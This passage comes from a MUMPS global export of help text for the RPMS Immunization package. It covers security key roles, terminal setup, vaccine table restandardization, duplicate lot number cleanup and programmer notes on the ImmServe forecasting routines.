"DATA",9002084.7,1,1,181,0)
immunization history. Other functions will only display the warning.
"DATA",9002084.7,1,1,182,0)
"DATA",9002084.7,1,1,183,0)
Listed below is the text of the warning. (Users without the BIZ
"DATA",9002084.7,1,1,184,0)
MANAGER Key will not see the last paragraph.) As the warning
"DATA",9002084.7,1,1,185,0)
indicates, restandardizing the table simply involves selecting "RES"
"DATA",9002084.7,1,1,186,0)
from the Manager Menu. This can be done at any time, and users need
"DATA",9002084.7,1,1,187,0)
not log out of the package. Runtime is a few seconds at most.
"DATA",9002084.7,1,1,188,0)
"DATA",9002084.7,1,1,189,0)
WARNING
"DATA",9002084.7,1,1,190,0)
---------
"DATA",9002084.7,1,1,191,0)
"DATA",9002084.7,1,1,192,0)
Vaccine Table (IMMUNIZATION File) is not standard--cannot proceed.
"DATA",9002084.7,1,1,193,0)
"DATA",9002084.7,1,1,194,0)
At this point you should back out of the Immunization Package
"DATA",9002084.7,1,1,195,0)
and contact your site manager or the person in charge of the
"DATA",9002084.7,1,1,196,0)
Immunization Software.
"DATA",9002084.7,1,1,197,0)
"DATA",9002084.7,1,1,198,0)
Or, you may fix this by Restandardizing the Immunization File.
"DATA",9002084.7,1,1,199,0)
To do so, proceed to the Manager Menu and select Restandardize.
"DATA",9002084.7,1,1,200,0)
(Menu Synonyms: MGR-->RES)
"DATA",9002084.7,1,1,201,0)
"DATA",9002084.7,1,1,202,0)
"DATA",9002084.7,1,1,203,0)
"DATA",9002084.7,1,1,204,0)
VI. DUPLICATE LOT NUMBERS
"DATA",9002084.7,1,1,205,0)
-------------------------
"DATA",9002084.7,1,1,206,0)
"DATA",9002084.7,1,1,207,0)
Some sites have duplicate Lot Numbers in their IMMUNIZATION LOT File,
"DATA",9002084.7,1,1,208,0)
which will cause the storing of Immunizations in the V IMMUNIZATION
"DATA",9002084.7,1,1,209,0)
File to fail. RPMS Immunization v8.1 recognizes duplicate Lot
"DATA",9002084.7,1,1,210,0)
Numbers ahead of time and informs the user. If the user holds the
"DATA",9002084.7,1,1,211,0)
BIZ MANAGER Key, the text below will be displayed:
"DATA",9002084.7,1,1,212,0)
"DATA",9002084.7,1,1,213,0)
Two steps should be taken to resolve duplicate Lot Numbers:
"DATA",9002084.7,1,1,214,0)
"DATA",9002084.7,1,1,215,0)
* STEP 1:
"DATA",9002084.7,1,1,216,0)
---------
"DATA",9002084.7,1,1,217,0)
Duplicate Lot Numbers are resolved under the Manager Menu, "Lot
"DATA",9002084.7,1,1,218,0)
Number Add/Edit" (MGR-->LOT). Go to this option and enter the Lot
"DATA",9002084.7,1,1,219,0)
Number in question. Two or more choices will be presented. Select
"DATA",9002084.7,1,1,220,0)
one of the choices to be the valid Lot Number. Edit this Lot Number,
"DATA",9002084.7,1,1,221,0)
making sure it is Active and that all relevant vaccines are listed
"DATA",9002084.7,1,1,222,0)
under it.
"DATA",9002084.7,1,1,223,0)
"DATA",9002084.7,1,1,224,0)
* STEP 2:
"DATA",9002084.7,1,1,225,0)
---------
"DATA",9002084.7,1,1,226,0)
Select and edit each of the duplicate Lot Numbers.
"DATA",9002084.7,1,1,227,0)
"DATA",9002084.7,1,1,228,0)
Edit the Lot Number itself by placing "z" at the beginning
"DATA",9002084.7,1,1,229,0)
(e.g., 483-116 --> z483-116). If there is a second duplicate, add
"DATA",9002084.7,1,1,230,0)
"zz" to the beginning of that Lot Number; for a third duplicate,
"DATA",9002084.7,1,1,231,0)
add "zzz", and so on. The adding of leading "z"s to the duplicates
"DATA",9002084.7,1,1,232,0)
will make them distinguishable from the valid Lot Number. This
"DATA",9002084.7,1,1,233,0)
method will also make the old duplicate Lot Numbers recognizable on
"DATA",9002084.7,1,1,234,0)
pre-existing visits.
"DATA",9002084.7,1,1,235,0)
"DATA",9002084.7,1,1,236,0)
The duplicate Lot Numbers should also be made INACTIVE.
"DATA",9002084.7,1,1,237,0)
If an old Visit is to be edited and it has one of the old duplicate
"DATA",9002084.7,1,1,238,0)
Lot Numbers, the old duplicate should be replaced with the current
"DATA",9002084.7,1,1,239,0)
valid Lot Number (easily recognized by ignoring the leading "z"s).
"DATA",9002084.7,1,1,240,0)
"DATA",9002084.7,1,1,241,0)
"DATA",9002084.7,1,1,242,0)
"DATA",9002084.7,1,1,243,0)
VII. PROTOCOLS FOR USE BY OTHER PACKAGES
"DATA",9002084.7,1,1,244,0)
---------------------------------------
"DATA",9002084.7,1,1,245,0)
"DATA",9002084.7,1,1,246,0)
RPMS Immunization v7 contains 3 Lismanager Protocols that may be of
"DATA",9002084.7,1,1,247,0)
use to programmers of other packages:
"DATA",9002084.7,1,1,248,0)
"DATA",9002084.7,1,1,249,0)
1) BI PATIENT VIEW/EDIT EXT CALL - This protocol calls up the Listman
"DATA",9002084.7,1,1,250,0)
Patient View/Edit screen. The called assumes that DFN (patient)
"DATA",9002084.7,1,1,251,0)
defined. Other optional parameters are described in routine
"DATA",9002084.7,1,1,252,0)
HAVEPAT^BIPATVW. Users will only have Edit capability if they
"DATA",9002084.7,1,1,253,0)
hold the BIZ EDIT PATIENTS Key.
"DATA",9002084.7,1,1,254,0)
"DATA",9002084.7,1,1,255,0)
2) BI IMMUNIZATION ADDED - This protocol is an Extended Action Type
"DATA",9002084.7,1,1,256,0)
of Protocol (any protocols entered as ITEMS will be called when
"DATA",9002084.7,1,1,257,0)
this protocol is called). The Description field of this protocol
"DATA",9002084.7,1,1,258,0)
lists all of the defined variables that relate to the immunization
"DATA",9002084.7,1,1,259,0)
that has just been added.
"DATA",9002084.7,1,1,260,0)
"DATA",9002084.7,1,1,261,0)
3) BI IMMUNIZATION DELETED - This protocol is an Extended Action
"DATA",9002084.7,1,1,262,0)
Type of Protocol (any protocols entered as ITEMS will be called
"DATA",9002084.7,1,1,263,0)
when this protocol is called). The Description field of this
"DATA",9002084.7,1,1,264,0)
protocol lists all of the defined variables that relate to the
"DATA",9002084.7,1,1,265,0)
immunization that has just been deleted.
"DATA",9002084.7,1,1,266,0)
"DATA",9002084.7,1,1,267,0)
"DATA",9002084.7,1,1,268,0)
"DATA",9002084.7,1,1,269,0)
*** END OF PACKAGE INFORMATION TEXT ***
"DATA",9002084.7,1,1,270,0)
.
"DATA",9002084.7,2,0)
KEYS, EXPLANATION OF
"DATA",9002084.7,2,1,0)
^9002084.701^68^68^3110916^^^
"DATA",9002084.7,2,1,1,0)
"DATA",9002084.7,2,1,2,0)
This screen displays all users who hold any of the four Keys to
"DATA",9002084.7,2,1,3,0)
the Immunization Package. The Keys, which begin with BIZ, are
"DATA",9002084.7,2,1,4,0)
listed as column headers at the top of the screen.
"DATA",9002084.7,2,1,5,0)
"DATA",9002084.7,2,1,6,0)
A "YES" in the column under a Key name indicates that the user
"DATA",9002084.7,2,1,7,0)
listed on that line holds the Key in the column header.
"DATA",9002084.7,2,1,8,0)
"DATA",9002084.7,2,1,9,0)
There are four Keys included in the Immunization Package:
"DATA",9002084.7,2,1,10,0)
"DATA",9002084.7,2,1,11,0)
"DATA",9002084.7,2,1,12,0)
1 - BIZMENU
"DATA",9002084.7,2,1,13,0)
-----------
"DATA",9002084.7,2,1,14,0)
Gives Users access to the Main Menu of the Immunization Package v8.X,
"DATA",9002084.7,2,1,15,0)
with minimal permission to view Patients' Immunization data, to print
"DATA",9002084.7,2,1,16,0)
Official Immunization Records, to view/print Due Lists, and to run
"DATA",9002084.7,2,1,17,0)
reports.
"DATA",9002084.7,2,1,18,0)
"DATA",9002084.7,2,1,19,0)
"DATA",9002084.7,2,1,20,0)
2 - BIZ EDIT PATIENTS
"DATA",9002084.7,2,1,21,0)
---------------------
"DATA",9002084.7,2,1,22,0)
Gives Users the ability to ADD/EDIT Patients' immunization data,
"DATA",9002084.7,2,1,23,0)
contraindications, skin tests, and other patient information. This
"DATA",9002084.7,2,1,24,0)
Key functions by making various Add/Edit Actions available on the
"DATA",9002084.7,2,1,25,0)
main Patient View screen of the Patient Immunization Record Option.
"DATA",9002084.7,2,1,26,0)
"DATA",9002084.7,2,1,27,0)
(Users without this key will still be able to view patient data
"DATA",9002084.7,2,1,28,0)
from the Patient Immunization Record Option, but they will only be
"DATA",9002084.7,2,1,29,0)
able to view the Immunization data and the Health Summary, and print
"DATA",9002084.7,2,1,30,0)
the Official Immunization Record.)
"DATA",9002084.7,2,1,31,0)
"DATA",9002084.7,2,1,32,0)
"DATA",9002084.7,2,1,33,0)
3 - BIZ MANAGER
"DATA",9002084.7,2,1,34,0)
---------------
"DATA",9002084.7,2,1,35,0)
Gives Users access to the Manager Menu of the New Immunization
"DATA",9002084.7,2,1,36,0)
Package and the full range of Manager functions, such as, editing
"DATA",9002084.7,2,1,37,0)
Case Managers, editing Form Letters, editing Site Parameters, etc.
"DATA",9002084.7,2,1,38,0)
"DATA",9002084.7,2,1,39,0)
If you have reached this menu, then you have the BIZ MANAGER Key
"DATA",9002084.7,2,1,40,0)
described above and are allowed to allocate or de-allocate any of
"DATA",9002084.7,2,1,41,0)
the Immunization (BIZ) Keys to other Users.
"DATA",9002084.7,2,1,42,0)
"DATA",9002084.7,2,1,43,0)
"DATA",9002084.7,2,1,44,0)
4 - BIZ LOT ONLY
"DATA",9002084.7,2,1,45,0)
----------------
"DATA",9002084.7,2,1,46,0)
This "stand-alone" option is NOT connected to the rest of the RPMS
"DATA",9002084.7,2,1,47,0)
Immunization Menu; instead it may be assigned to any menu of any user
"DATA",9002084.7,2,1,48,0)
for the purpose of adding and editing Lot Numbers in the Immunization
"DATA",9002084.7,2,1,49,0)
Package. The option allows someone, such as a pharmacist, to add and
"DATA",9002084.7,2,1,50,0)
maintain the Lot Number Inventory without gaining access to the rest
"DATA",9002084.7,2,1,51,0)
of the Manager Menu in the Immunization Package.
"DATA",9002084.7,2,1,52,0)
"DATA",9002084.7,2,1,53,0)
"DATA",9002084.7,2,1,54,0)
"DATA",9002084.7,2,1,55,0)
There are two Actions presented at the bottom of the screen:
"DATA",9002084.7,2,1,56,0)
"DATA",9002084.7,2,1,57,0)
1 - "Add/Edit a Holder" allows you to allocate or deallocate the
"DATA",9002084.7,2,1,58,0)
Immunization Keys to users.
"DATA",9002084.7,2,1,59,0)
"DATA",9002084.7,2,1,60,0)
2 - "Help" (this screen) presents a detailed explanation of the
"DATA",9002084.7,2,1,61,0)
privileges each Key bestows upon holders of the Key.
"DATA",9002084.7,2,1,62,0)
"DATA",9002084.7,2,1,63,0)
"DATA",9002084.7,2,1,64,0)
NOTE: If you intend to allocate Keys to a large number of Users,
"DATA",9002084.7,2,1,65,0)
it may be more convenient to have your Site Manager to this
"DATA",9002084.7,2,1,66,0)
in batch mode under the Site Manager's Key Management Menu.
"DATA",9002084.7,2,1,67,0)
"DATA",9002084.7,2,1,68,0)
.
"DATA",9002084.7,3,0)
PROGRAMMER INFO FOR ADDING NEW VACCINES
"DATA",9002084.7,3,1,0)
^9002084.701^41^41^3100408^^^^
"DATA",9002084.7,3,1,1,0)
1) ALWAYS INCLUDE RTN BILOGO in any patch, noting the patch, per SAC, in
"DATA",9002084.7,3,1,2,0)
the 2nd line. This will cause the display of Version# everywhere to show
"DATA",9002084.7,3,1,3,0)
the patch level, making it easy for site managers and users to know and
"DATA",9002084.7,3,1,4,0)
report what patch level they are at.
"DATA",9002084.7,3,1,5,0)
"DATA",9002084.7,3,1,6,0)
2) If new fields are added to ImmServe's Input string, they must be added
"DATA",9002084.7,3,1,7,0)
in the routine BIEXPRT5, making sure that Field Numbers are correctly
"DATA",9002084.7,3,1,8,0)
placed in the Hx string passed to ImmServe.
"DATA",9002084.7,3,1,9,0)
"DATA",9002084.7,3,1,10,0)
3) If new fields are added to ImmServe's Output string, they must be added
"DATA",9002084.7,3,1,11,0)
to the routine BIPATUP1. The code around BIPC (Piece Place Marker)
"DATA",9002084.7,3,1,12,0)
and BIDD (Doses Due) must be looked at to ensure we are pulling the
"DATA",9002084.7,3,1,13,0)
correct pieces of the Forecast string returned by ImmServe.
"DATA",9002084.7,3,1,14,0)
"DATA",9002084.7,3,1,15,0)
4) When adding a new Rules Version (e.g., IHS_NAV2), the new versions must
"DATA",9002084.7,3,1,16,0)
be represented in 2 places: 1) In the .08 field of the BI SITE PARAMETERS
"DATA",9002084.7,3,1,17,0)
File; and 2) At RULES^BIUTL2. Also, the Rules selection Site Parameter
"DATA",9002084.7,3,1,18,0)
code must be updated in rtn BISITE2 at linelabels RULES, RULES1, and
"DATA",9002084.7,3,1,19,0)
TEXT8.
"DATA",9002084.7,3,1,20,0)
"DATA",9002084.7,3,1,21,0)
5) BIEXPRT5 is the routine that gathers and translates all data going out
"DATA",9002084.7,3,1,22,0)
to ImmServe. To change data going to ImmServe, look at BIEXPRT5.
"DATA",9002084.7,3,1,23,0)
"DATA",9002084.7,3,1,24,0)
6) BIPATUP is the routine that updates a patient's forecast.
"DATA",9002084.7,3,1,25,0)
First it gathers the Patient's Imm History by calling BIEXPRT3 (which
"DATA",9002084.7,3,1,26,0)
calls BIEXPRT5--see above) and then puts the history into the proper
"DATA",9002084.7,3,1,27,0)
ImmServe format by calling BIEXPRT4. BIPATUP then gets the forecast by
"DATA",9002084.7,3,1,28,0)
calling ImmServe (calls BIXCALL) and then loads the forecast (calls
"DATA",9002084.7,3,1,29,0)
BIPATUP1). * BIPATUP1 is the routine that interprets the ImmServe
"DATA",9002084.7,3,1,30,0)
forecast string, does any "home grown" forecasting (e.g., Influenza,
"DATA",9002084.7,3,1,31,0)
Pneumovax), and loads that all into the patient's Due records (stored in
"DATA",9002084.7,3,1,32,0)
^BIPDUE). It also stores any errors in ^BIPERR.
"DATA",9002084.7,3,1,33,0)
"DATA",9002084.7,3,1,34,0)
7) To add a new vaccine or make changes to standard fields, follow
"DATA",9002084.7,3,1,35,0)
BUILD^BIUTLFIX. When adding new vaccines, it may be necessary to add
"DATA",9002084.7,3,1,36,0)
Related Contraindication HL7 Codes (field .12) and to look
"DATA",9002084.7,3,1,37,0)
contraindication code in rtn BIEXPRT5.
"DATA",9002084.7,3,1,38,0)
"DATA",9002084.7,3,1,39,0)
8) To add a new ImmServe Operating System Call (such as Windows2000?), add
"DATA",9002084.7,3,1,40,0)
to the .17 Field of the BI SITE PARAMETERS File and also in routine
"DATA",9002084.7,3,1,41,0)
BIOSC^BIXCALL. Also, must add to Site Parameter edit in OPSYSE^BISITE3.
"DATA",9002084.7,4,0)
SETUP INFORMATION FOR VERSION 8.5
"DATA",9002084.7,4,1,0)
^9002084.701^270^270^3110916^^
"DATA",9002084.7,4,1,1,0)
"DATA",9002084.7,4,1,2,0)
The text presented here is intended to provide Site Managers with
"DATA",9002084.7,4,1,3,0)
helpful information regarding setup and management of the RPMS
"DATA",9002084.7,4,1,4,0)
Immunization Package, version 8.5.
"DATA",9002084.7,4,1,5,0)
"DATA",9002084.7,4,1,6,0)
"DATA",9002084.7,4,1,7,0)
"DATA",9002084.7,4,1,8,0)
I. OPTIONS
"DATA",9002084.7,4,1,9,0)
----------
"DATA",9002084.7,4,1,10,0)
"DATA",9002084.7,4,1,11,0)
The main menu option for the Immunization package is BIMENU.
"DATA",9002084.7,4,1,12,0)
At most sites this would be placed on AKMOCORE along with other
"DATA",9002084.7,4,1,13,0)
RPMS packages. For the sake of consistency from site to site,
"DATA",9002084.7,4,1,14,0)
it is recommended that the synonym "IMM" (Immunization) be
"DATA",9002084.7,4,1,15,0)
given to the main menu option BIMENU, however, this is not a
"DATA",9002084.7,4,1,16,0)
requirement. BIMENU allows access to every other option within
"DATA",9002084.7,4,1,17,0)
the package. (The Package Keys, BIZMENU ,BIZ EDIT PATIENTS, and
"DATA",9002084.7,4,1,18,0)
BIZ MANAGER, are discussed below under Security in Section II.)
"DATA",9002084.7,4,1,19,0)
"DATA",9002084.7,4,1,20,0)
The option BI PATIENT VIEW/EDIT, "Patient Immunization Record",
"DATA",9002084.7,4,1,21,0)
is the main option for all users to view a patient's immunization
"DATA",9002084.7,4,1,22,0)
data. This option allows users to display or print the patient's
"DATA",9002084.7,4,1,23,0)
Immunization History and Forecast, Official Immunization Record, and
"DATA",9002084.7,4,1,24,0)
Health Summary. If the user has the appropriate key (BIZ EDIT
"DATA",9002084.7,4,1,25,0)
PATIENTS), additional actions for adding/editing patient data will
"DATA",9002084.7,4,1,26,0)
be made available under this option.
"DATA",9002084.7,4,1,27,0)
"DATA",9002084.7,4,1,28,0)
NOTE: Users accessing this option will have NO ADD/EDIT capability
"DATA",9002084.7,4,1,29,0)
whatsoever--it will be informational only--UNLESS they have
"DATA",9002084.7,4,1,30,0)
the BIZ EDIT PATIENTS Key; in which case additional Add/Edit
"DATA",9002084.7,4,1,31,0)
Actions will be available. (See Security Section II below.)
"DATA",9002084.7,4,1,32,0)
"DATA",9002084.7,4,1,33,0)
This option may be attached to any other Kernel menu and need not
"DATA",9002084.7,4,1,34,0)
be accessed via the main menu, BIMENU. This option is found within
"DATA",9002084.7,4,1,35,0)
the package under the Patient Menu of the Immunization Main Menu.
"DATA",9002084.7,4,1,36,0)
"DATA",9002084.7,4,1,37,0)
After this package has been installed and the BIMENU and BI PATIENT
"DATA",9002084.7,4,1,38,0)
VIEW/EDIT Options added to the appropriate menus, it is a good idea
"DATA",9002084.7,4,1,39,0)
to run the "Build Primary Menu Trees" Option under Kernel Menu
"DATA",9002084.7,4,1,40,0)
Management (under AKMOEVE). This will enable users to jump to menu
"DATA",9002084.7,4,1,41,0)
synonyms within the new Immunization Package.
"DATA",9002084.7,4,1,42,0)
"DATA",9002084.7,4,1,43,0)
There is also an option called BI LOT NUMBER NON-MANAGER, which is
"DATA",9002084.7,4,1,44,0)
locked by the Key BIZ LOT NON-MANAGER. This "stand-alone" option is
"DATA",9002084.7,4,1,45,0)
NOT connected to the rest of the RPMS Immunization Menu; instead it
"DATA",9002084.7,4,1,46,0)
may be assigned to any menu of any user for the purpose of adding and
"DATA",9002084.7,4,1,47,0)
editing Lot Numbers in the Immunization Package. The option allows
"DATA",9002084.7,4,1,48,0)
someone, such as a pharmacist, to add and maintain the Lot Number
"DATA",9002084.7,4,1,49,0)
Inventory without gaining access to the rest of the Manager Menu in
"DATA",9002084.7,4,1,50,0)
the Immunization Package.
"DATA",9002084.7,4,1,51,0)
"DATA",9002084.7,4,1,52,0)
"DATA",9002084.7,4,1,53,0)
"DATA",9002084.7,4,1,54,0)
II. SECURITY
"DATA",9002084.7,4,1,55,0)
------------
"DATA",9002084.7,4,1,56,0)
"DATA",9002084.7,4,1,57,0)
The Security Key BIZMENU allows users to access the Main Menu of
"DATA",9002084.7,4,1,58,0)
the RPMS Immunization Package, BIMENU, and its submenus for viewing
"DATA",9002084.7,4,1,59,0)
Patient data and Reports. The BIZMENU Key does NOT provide any
"DATA",9002084.7,4,1,60,0)
Add or Edit capabilities, however, Holders of this key may print
"DATA",9002084.7,4,1,61,0)
patient letters, view patient data, and run reports.
"DATA",9002084.7,4,1,62,0)
"DATA",9002084.7,4,1,63,0)
The Security Key BIZ EDIT PATIENTS allows users to ADD and EDIT
"DATA",9002084.7,4,1,64,0)
a patient's Immunization History, Contraindications, Skin Tests,
"DATA",9002084.7,4,1,65,0)
Parent/Guardian, etc. This key does not provide access to any
"DATA",9002084.7,4,1,66,0)
additional menu options; instead, it adds several Actions to the
"DATA",9002084.7,4,1,67,0)
main Patient View screen. This Key should be given to staff who
"DATA",9002084.7,4,1,68,0)
are responsible for data entry and Patient Management.
"DATA",9002084.7,4,1,69,0)
"DATA",9002084.7,4,1,70,0)
The security key BIZ MANAGER allows a user to access the Manager
"DATA",9002084.7,4,1,71,0)
Menu (BI MENU-MANAGER), which is a submenu of the main menu (BIMENU).
"DATA",9002084.7,4,1,72,0)
The Manager Menu provides access to many sensitive functions
"DATA",9002084.7,4,1,73,0)
pertaining to Site Parameters, Form Letters, the Vaccine Table,
"DATA",9002084.7,4,1,74,0)
Lot Numbers, Exports, and the allocation of Security Keys.
"DATA",9002084.7,4,1,75,0)
"DATA",9002084.7,4,1,76,0)
The BIZ MANAGER Key should only be given to the manager of the
"DATA",9002084.7,4,1,77,0)
Immunization Package.
"DATA",9002084.7,4,1,78,0)
"DATA",9002084.7,4,1,79,0)
Also see the "Help" Action on the HOLDERS OF IMMUNIZATION
"DATA",9002084.7,4,1,80,0)
KEYS" Screen (MGR-->KEY-->Help).
"DATA",9002084.7,4,1,81,0)
"DATA",9002084.7,4,1,82,0)
Finally, the Key BIZ LOT ONLY can be given any person (a pharmacist,
"DATA",9002084.7,4,1,83,0)
for example) who needs to add or edit Vaccine Lot Numbers but does
"DATA",9002084.7,4,1,84,0)
not need access to the entire Imm Manager Menu.
"DATA",9002084.7,4,1,85,0)
NOTE: Assignment of this option, BI LOT NUMBER NON-MANAGER, to other
"DATA",9002084.7,4,1,86,0)
menus in RPMS is done by the local site manager, as is the key, BIZ
"DATA",9002084.7,4,1,87,0)
LOT ONLY. This option and its key cannot be assigned from within
"DATA",9002084.7,4,1,88,0)
the Immunization Package itself.
"DATA",9002084.7,4,1,89,0)
"DATA",9002084.7,4,1,90,0)
"DATA",9002084.7,4,1,91,0)
"DATA",9002084.7,4,1,92,0)
III. DEVICES
"DATA",9002084.7,4,1,93,0)
------------
"DATA",9002084.7,4,1,94,0)
"DATA",9002084.7,4,1,95,0)
This package makes extensive use of the VA Screen Manager and
"DATA",9002084.7,4,1,96,0)
List Manager, which requires that several of the cursor and screen
"DATA",9002084.7,4,1,97,0)
handling fields of the Terminal Type file be present for any Device
"DATA",9002084.7,4,1,98,0)
accessing the package. It is recommended that any Device
"DATA",9002084.7,4,1,99,0)
accessing this package be given a Terminal Type ("Subtype")
"DATA",9002084.7,4,1,100,0)
of "C-VT100", since the standard VA Kernel distribution comes
"DATA",9002084.7,4,1,101,0)
with all of the necessary codes pre-loaded. A user whose Terminal
"DATA",9002084.7,4,1,102,0)
Type does not contain a complete set of screen handling codes will
"DATA",9002084.7,4,1,103,0)
receive a message that Screenman cannot "load the form."
"DATA",9002084.7,4,1,104,0)
"DATA",9002084.7,4,1,105,0)
If you suspect that the screen handling codes for C-VT100 on your
"DATA",9002084.7,4,1,106,0)
system are not complete, this package comes with a routine, BIVT100,
"DATA",9002084.7,4,1,107,0)
that will update (as of 2000) your VT100 codes. The routine must be
"DATA",9002084.7,4,1,108,0)
run from Programmer Mode, and a line with ZIS must be uncommented.
"DATA",9002084.7,4,1,109,0)
This job should be done by a programmer or experienced Site Manager.
"DATA",9002084.7,4,1,110,0)
"DATA",9002084.7,4,1,111,0)
Other Terminal Types may also be chosen, however, the screen
"DATA",9002084.7,4,1,112,0)
handling codes for Cursor movements, "PF keys", "Erase Entire
"DATA",9002084.7,4,1,113,0)
Page", etc., may need to be entered manually if they are not
"DATA",9002084.7,4,1,114,0)
already present for the selected Terminal Type.
"DATA",9002084.7,4,1,115,0)
"DATA",9002084.7,4,1,116,0)
If for some reason it is not practical to define Devices
"DATA",9002084.7,4,1,117,0)
accessing the package with a Subtype of C-VT100, users of the
"DATA",9002084.7,4,1,118,0)
package may be given a "DEFAULT TERMINAL TYPE FOR LM" in the
"DATA",9002084.7,4,1,119,0)
NEW PERSON File #200 of C-VT100. (They will then be given a
"DATA",9002084.7,4,1,120,0)
Terminal Type of C-VT100 regardless of which DEVICE they sign
"DATA",9002084.7,4,1,121,0)
on through.) It may also be necessary to set the field "ASK
"DATA",9002084.7,4,1,122,0)
DEVICE TYPE AT SIGN-ON" (again in file #200) equal to "ASK" in
"DATA",9002084.7,4,1,123,0)
order to get a user's Terminal Type to change to the C-VT100.
"DATA",9002084.7,4,1,124,0)
"DATA",9002084.7,4,1,125,0)
It is important that PC's accessing this software through terminal
"DATA",9002084.7,4,1,126,0)
emulation software have their function keys F1-F4 set to transmit
"DATA",9002084.7,4,1,127,0)
standard VT-100 codes for these keys rather than other customized
"DATA",9002084.7,4,1,128,0)
codes.
"DATA",9002084.7,4,1,129,0)
"DATA",9002084.7,4,1,130,0)
This software makes use of basic character format codes such as
"DATA",9002084.7,4,1,131,0)
Reverse Video, Highlight, and Underlining. It may be helpful to
"DATA",9002084.7,4,1,132,0)
adjust the colors that the terminal emulation software employs to
"DATA",9002084.7,4,1,133,0)
display these formats.
"DATA",9002084.7,4,1,134,0)
"DATA",9002084.7,4,1,135,0)
There are several network terminal emulation programs available,
"DATA",9002084.7,4,1,136,0)
however many of them have limitations such as not recognizing
"DATA",9002084.7,4,1,137,0)
function keys, not displaying reverse video, not slave printing, etc.
"DATA",9002084.7,4,1,138,0)
As of this printing, February 2004, we have found that NetTerm 4.2e
"DATA",9002084.7,4,1,139,0)
available at a nominal cost from Intersoft International, Inc. via
"DATA",9002084.7,4,1,140,0)
the WWW, is among the best products for use with RPMS software.
"DATA",9002084.7,4,1,141,0)
Trial versions may be obtained online at:
"DATA",9002084.7,4,1,142,0)
http://www.securenetterm.com/html/netterm.html
"DATA",9002084.7,4,1,143,0)
"DATA",9002084.7,4,1,144,0)
Initial difficulties with the screen handling codes for ScreenMan
"DATA",9002084.7,4,1,145,0)
and Listman are not specific to Immunization; however, if problems
"DATA",9002084.7,4,1,146,0)
with the setup cannot be resolved, please contact your Computer
"DATA",9002084.7,4,1,147,0)
Support staff for further assistance.
"DATA",9002084.7,4,1,148,0)
"DATA",9002084.7,4,1,149,0)
"DATA",9002084.7,4,1,150,0)
"DATA",9002084.7,4,1,151,0)
IV. SITE PARAMETERS
"DATA",9002084.7,4,1,152,0)
--------------------
"DATA",9002084.7,4,1,153,0)
"DATA",9002084.7,4,1,154,0)
As part of the installation of this new version of Immunization,
"DATA",9002084.7,4,1,155,0)
the site parameters must be reviewed and edited.
"DATA",9002084.7,4,1,156,0)
"DATA",9002084.7,4,1,157,0)
The Site Parameter screen may be accessed from within the
"DATA",9002084.7,4,1,158,0)
Immunization menus by selecting Manager Menu from the the Main Menu,
"DATA",9002084.7,4,1,159,0)
and then selecting Edit Site Parameters (MGR-->ESP). Help text is
"DATA",9002084.7,4,1,160,0)
displayed during the edit each Site Parameter.
"DATA",9002084.7,4,1,161,0)
"DATA",9002084.7,4,1,162,0)
"DATA",9002084.7,4,1,163,0)
"DATA",9002084.7,4,1,164,0)
V. VACCINE TABLE
"DATA",9002084.7,4,1,165,0)
-------------------
"DATA",9002084.7,4,1,166,0)
"DATA",9002084.7,4,1,167,0)
The Immunization Package version 8.1 comes with a new Vaccine Table
"DATA",9002084.7,4,1,168,0)
that has been standardized with the CDC's NIP HL7/CVX Code Table.
"DATA",9002084.7,4,1,169,0)
The vaccine table, spellings, CVX codes and CPT codes are taken directly
"DATA",9002084.7,4,1,170,0)
from the CDC table http://www.cdc.gov/nip/registry/hl7/hl7-cvx.pdf.
"DATA",9002084.7,4,1,171,0)
There are several new fields in the Vaccine Table that relate to new
"DATA",9002084.7,4,1,172,0)
functions in the package, most notably the ImmServe Forecasting
"DATA",9002084.7,4,1,173,0)
utility (See IV. above). For this reason it is critically important
"DATA",9002084.7,4,1,174,0)
that specific fields within the table not be altered.
"DATA",9002084.7,4,1,175,0)
"DATA",9002084.7,4,1,176,0)
Each time a user logs into the Immunization Package, the Vaccine
"DATA",9002084.7,4,1,177,0)
Table is checked for integrity. If certain fields have been altered,
"DATA",9002084.7,4,1,178,0)
a warning message is issued, and several functions within the package
"DATA",9002084.7,4,1,179,0)
begin to display the warning. Some basic functions of the package
"DATA",9002084.7,4,1,180,0)
will continue to operate, such as the display of a patient's
"DATA",9002084.7,4,1,181,0)
immunization history. Other functions will only display the warning.
"DATA",9002084.7,4,1,182,0)
"DATA",9002084.7,4,1,183,0)
Listed below is the text of the warning. (Users without the BIZ
"DATA",9002084.7,4,1,184,0)
MANAGER Key will not see the last paragraph.) As the warning
"DATA",9002084.7,4,1,185,0)
indicates, restandardizing the table simply involves selecting "RES"
"DATA",9002084.7,4,1,186,0)
from the Manager Menu. This can be done at any time, and users need
"DATA",9002084.7,4,1,187,0)
not log out of the package. Runtime is a few seconds at most.
"DATA",9002084.7,4,1,188,0)
"DATA",9002084.7,4,1,189,0)
WARNING
"DATA",9002084.7,4,1,190,0)
---------
"DATA",9002084.7,4,1,191,0)
"DATA",9002084.7,4,1,192,0)
Vaccine Table (IMMUNIZATION File) is not standard--cannot proceed.
"DATA",9002084.7,4,1,193,0)
"DATA",9002084.7,4,1,194,0)
At this point you should back out of the Immunization Package
"DATA",9002084.7,4,1,195,0)
and contact your site manager or the person in charge of the
"DATA",9002084.7,4,1,196,0)
Immunization Software.
"DATA",9002084.7,4,1,197,0)
"DATA",9002084.7,4,1,198,0)
Or, you may fix this by Restandardizing the Immunization File.
"DATA",9002084.7,4,1,199,0)
To do so, proceed to the Manager Menu and select Restandardize.
"DATA",9002084.7,4,1,200,0)
(Menu Synonyms: MGR-->RES)
"DATA",9002084.7,4,1,201,0)
"DATA",9002084.7,4,1,202,0)
"DATA",9002084.7,4,1,203,0)
"DATA",9002084.7,4,1,204,0)
VI. DUPLICATE LOT NUMBERS
"DATA",9002084.7,4,1,205,0)
-------------------------
"DATA",9002084.7,4,1,206,0)
"DATA",9002084.7,4,1,207,0)
Some sites have duplicate Lot Numbers in their IMMUNIZATION LOT File,
"DATA",9002084.7,4,1,208,0)
which will cause the storing of Immunizations in the V IMMUNIZATION
"DATA",9002084.7,4,1,209,0)
File to fail. RPMS Immunization v8.1 recognizes duplicate Lot
"DATA",9002084.7,4,1,210,0)
Numbers ahead of time and informs the user. If the user holds the
"DATA",9002084.7,4,1,211,0)
BIZ MANAGER Key, the text below will be displayed:
"DATA",9002084.7,4,1,212,0)
"DATA",9002084.7,4,1,213,0)
Two steps should be taken to resolve duplicate Lot Numbers:
"DATA",9002084.7,4,1,214,0)
"DATA",9002084.7,4,1,215,0)
* STEP 1:
"DATA",9002084.7,4,1,216,0)
---------
"DATA",9002084.7,4,1,217,0)
